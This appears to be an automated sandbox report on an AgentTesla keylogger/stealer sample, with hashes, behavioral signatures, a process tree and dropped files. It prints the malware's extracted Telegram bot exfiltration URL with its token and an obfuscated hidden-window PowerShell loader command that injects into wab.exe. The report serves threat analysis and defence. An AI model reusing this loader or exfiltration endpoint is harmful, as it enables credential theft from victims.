agenttesla | 3b530ace3209771f676e361ebc54dfc5d992d5069db93d416cd4b60745ccc400

Analysis

max time kernel
90s
max time network
90s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
07/03/2024, 13:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

226350194-050944-sanlccjavap0003-11764.exe
Size

626KB
MD5

0d4bb5c57ce0f99b36056892cfe87f0c
SHA1

bd884e9d666bce68ef23dfa139f6477f1c50f7ab
SHA256

0301d446fd70d25f294abb066b139bdc8d5362f86d9d10ae4c5ed13e7e6f311c
SHA512

7d404dc721e4eb51f91956b96d3864ae2d2cc9e8c8464d446abf087b84466230ddea2662107b5d192369e8b2211b3616025628dc07f4eb679676144915dcaf6e
SSDEEP

12288:RhKVcnRerrRiJJGDktgdRYCryyqmsufs5BKGR9YWYn+4t8w:REGnReZeJGDikBrLqmZgBKgPKnt/

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1696	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2232	powershell.exe
1696	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2232 set thread context of 1696	2232	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2232	powershell.exe
2232	powershell.exe
2232	powershell.exe
2232	powershell.exe
2232	powershell.exe
2232	powershell.exe
2232	powershell.exe
2232	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2232	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2232	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2960 wrote to memory of 2232	2960	226350194-050944-sanlccjavap0003-11764.exe	28
PID 2960 wrote to memory of 2232	2960	226350194-050944-sanlccjavap0003-11764.exe	28
PID 2960 wrote to memory of 2232	2960	226350194-050944-sanlccjavap0003-11764.exe	28
PID 2960 wrote to memory of 2232	2960	226350194-050944-sanlccjavap0003-11764.exe	28
PID 2232 wrote to memory of 2144	2232	powershell.exe	30
PID 2232 wrote to memory of 2144	2232	powershell.exe	30
PID 2232 wrote to memory of 2144	2232	powershell.exe	30
PID 2232 wrote to memory of 2144	2232	powershell.exe	30
PID 2232 wrote to memory of 1696	2232	powershell.exe	34
PID 2232 wrote to memory of 1696	2232	powershell.exe	34
PID 2232 wrote to memory of 1696	2232	powershell.exe	34
PID 2232 wrote to memory of 1696	2232	powershell.exe	34
PID 2232 wrote to memory of 1696	2232	powershell.exe	34
PID 2232 wrote to memory of 1696	2232	powershell.exe	34

C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe
"C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2232
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
    3⤵
    PID:2144
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:1696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar9979.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Civilhortonoms\Dyretmmersken\Mealybug\Laesning.Sko

Filesize
348KB

MD5
edac2c2f62e371a80143df8caaec5b24

SHA1
0b7e4c090f25b6a0ffdab3e1d4e94ea3a706584b

SHA256
ae0652e2eedf1db5506d11bdf75d677c37fb7896c64435f6afdf9161235a9616

SHA512
aa37fc1656f385b4a18c2cd8edd4c6befec3b9df14fb656bbc831274c4e1708e292e0e60e26470f3159d2ab1819b39594cc854428b65028bc468c43d3d12e3be

Download Submit
C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig

Filesize
57KB

MD5
f5a06265c76853290d3b7ed1c1d3e7b9

SHA1
4083441407a629edd297d1a480a4957740b99fd1

SHA256
f15289a9086ec32c0f072940209c5c50412dde5275dac49a8d271cb53e843eab

SHA512
52ef36d8443eec762f2980b0ada477a9b74f0af2d0cedfb73015fbac04c28e85a85af4be6a4f67c6d7ee3b59b07abf6be2042465154ac3525e035947db15d6e8

Download Submit
memory/1696-87-0x0000000077E00000-0x0000000077ED6000-memory.dmp

Filesize
856KB

Download
memory/1696-86-0x00000000008F0000-0x0000000001952000-memory.dmp

Filesize
16.4MB

Download
memory/1696-27-0x0000000001960000-0x00000000040BC000-memory.dmp

Filesize
39.4MB

Download
memory/1696-89-0x00000000008F0000-0x0000000000930000-memory.dmp

Filesize
256KB

Download
memory/1696-90-0x000000006F750000-0x000000006FE3E000-memory.dmp

Filesize
6.9MB

Download
memory/1696-32-0x00000000008F0000-0x0000000001952000-memory.dmp

Filesize
16.4MB

Download
memory/1696-31-0x0000000001960000-0x00000000040BC000-memory.dmp

Filesize
39.4MB

Download
memory/1696-30-0x0000000077E00000-0x0000000077ED6000-memory.dmp

Filesize
856KB

Download
memory/1696-29-0x0000000077E36000-0x0000000077E37000-memory.dmp

Filesize
4KB

Download
memory/1696-28-0x0000000077C10000-0x0000000077DB9000-memory.dmp

Filesize
1.7MB

Download
memory/2232-16-0x0000000005D40000-0x0000000005E40000-memory.dmp

Filesize
1024KB

Download
memory/2232-19-0x00000000744A0000-0x0000000074A4B000-memory.dmp

Filesize
5.7MB

Download
memory/2232-26-0x0000000006360000-0x0000000008ABC000-memory.dmp

Filesize
39.4MB

Download
memory/2232-24-0x0000000077C10000-0x0000000077DB9000-memory.dmp

Filesize
1.7MB

Download
memory/2232-22-0x0000000006360000-0x0000000008ABC000-memory.dmp

Filesize
39.4MB

Download
memory/2232-21-0x0000000006360000-0x0000000008ABC000-memory.dmp

Filesize
39.4MB

Download
memory/2232-20-0x00000000025C0000-0x0000000002600000-memory.dmp

Filesize
256KB

Download
memory/2232-25-0x0000000077E00000-0x0000000077ED6000-memory.dmp

Filesize
856KB

Download
memory/2232-18-0x0000000005170000-0x0000000005174000-memory.dmp

Filesize
16KB

Download
memory/2232-8-0x00000000744A0000-0x0000000074A4B000-memory.dmp

Filesize
5.7MB

Download
memory/2232-15-0x00000000025C0000-0x0000000002600000-memory.dmp

Filesize
256KB

Download
memory/2232-11-0x00000000025C0000-0x0000000002600000-memory.dmp

Filesize
256KB

Download
memory/2232-12-0x00000000025C0000-0x0000000002600000-memory.dmp

Filesize
256KB

Download
memory/2232-88-0x0000000006360000-0x0000000008ABC000-memory.dmp

Filesize
39.4MB

Download
memory/2232-10-0x00000000025C0000-0x0000000002600000-memory.dmp

Filesize
256KB

Download
memory/2232-9-0x00000000744A0000-0x0000000074A4B000-memory.dmp

Filesize
5.7MB

Download